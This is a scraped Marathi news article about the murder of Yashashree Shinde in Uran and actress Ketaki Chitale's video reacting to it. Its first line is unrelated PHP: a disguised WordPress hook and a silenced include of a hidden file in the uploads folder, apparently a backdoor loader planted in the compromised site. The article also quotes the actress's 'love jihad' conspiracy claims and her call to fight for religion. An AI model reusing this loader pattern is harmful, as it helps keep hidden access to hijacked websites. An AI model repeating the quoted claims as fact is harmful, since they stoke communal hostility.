add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ketaki chitale: आपल्या मुली गायब होतात, फ्रीज, कपाटात सापडतात; यशश्रीला न्याय द्या…मराठी अभिनेत्रीचा संताप – SOCH INDIA
Menu

अपराध समाचार
ketaki chitale: आपल्या मुली गायब होतात, फ्रीज, कपाटात सापडतात; यशश्रीला न्याय द्या…मराठी अभिनेत्रीचा संताप

nobanner

२० वर्षीय तरुणीवर वार करून तिची निर्घृण हत्या करण्यात आल्याच्या घटनेनं नवी मुंबई हादरली आहे. यशश्री शिंदे असं या तरुणीचं नाव होतं. तिला न्याय मिळावा यासाठी नागरिक रस्त्यावर उतरताना दिसत आहेत. तर सोशल मीडियावरही या घटनेचा संताप व्यक्त करण्यात येतोय. आता अभिनेत्री केतकी चितळे हिनं हेखील या प्रकरणावर भाष्य केलंय. यशश्रीला न्याय मिळालाच पाहिजे, असं म्हणत तिनं लव्ह जिहाद हा मुद्दाही मांडला आहे.

केतकी अनेकदा सामाजिक मुद्द्यावर व्यक्त होताना दिसते. आता केतकीनं यशश्री शिंदे प्रकरणावर व्हिडिओ शेअर केला असून संताप व्यक्त केलाय.

काय म्हटलंय केतकीनं तिच्या व्हिडिओमध्ये?

लव्ह जिहाद फक्त बिहारमध्ये होतोय, हे खोटं आहे.
लव्ह जिहाद फक्त केरळमध्ये होतोय, हे खोटं आहे.
लव्ह जिहाद फक्त पश्चिम बंगालमध्ये होतोय, हे खोटं आहे.
लव्ह जिहाद फक्त मुस्लिमांचा प्रभाव असेलल्या राज्यात होतोय हे खोटं आहे.
लव्ह जिहादचं प्रमाण फक्त ग्रामीण भागात आहे, हे खोटं आहे.
आर्थिकदृष्ट्या मागासलेल्या महिला लव्ह जिहादला बळी पडताय, हे खोटं आहे.
जिथं जिथं हिंदू आहेत तिथं तिथं लव्ह जिहाद आहे.

आपल्या मुली गायब होतायत. कधी फ्रीजमध्ये सापडतात, कधी कपाटात ,तर कधी समुद्रात. नाही तर सुटकेसमध्ये. पूर्वी लोक स्वातंत्र्यासाठी लढले. आपल्याला आता धर्मासाठी लढायचं आहे.

पोलिस आपल्या बाजूने नाहीत. प्रशासन आपल्या बाजूनं नाही. आपल्याला एकत्र येणं गरजेचं आहे.

हा व्हिडिओ शेअर करताना केतकीनं #justiceforyashshreeshinde हा हॅशटॅग वापरला आहे.

काय आहे नेमकं प्रकरण?

रायगड जिल्ह्यातल्या उरणमध्ये राहणाऱ्या २० वर्षीय तरुणीवर वार करून तिची निर्घृण हत्या करण्यात आली. या तरुणीचा मृतदेह उरण स्थानकालगतच्या झुडपात आढळून आल्यानंतर हा धक्कादायक प्रकार उघडकीस आला.

या घटनेतील मृत तरुणी २५ जुलैला दुपारी दीडच्या सुमारास घरातून बाहेर पडली होती. त्यानंतर ती मैत्रीणीच्या घरी गेली. तेथून ती पनवेल स्थानकाच्या दिशेनं गेली होती. त्यानंतर सांयकाळी ४.३० वाजण्याच्या सुमारास तिचा मोबाइल बंद झाला. याचदरम्यान तरुणीवर अज्ञातानं वार करून तिची हत्या करून पलायन केलं होतं.

दरम्यान, तरुणीच्या हत्या प्रकरणात ज्या दाऊद शेखवर संशय व्यक्त करण्यात येत आहे. त्यानं काही वर्षांपूर्वी यशश्रीची छेडछाड केली होती. त्यामुळं त्याच्याविरोधात विनयभंग आणि पोक्सो कायद्या अंर्तगत गुन्हा दाखल करण्यात आला होता. आता हा आरोपी फरार झाला आहे. पोलिस त्याचा शोध घेत आहेत.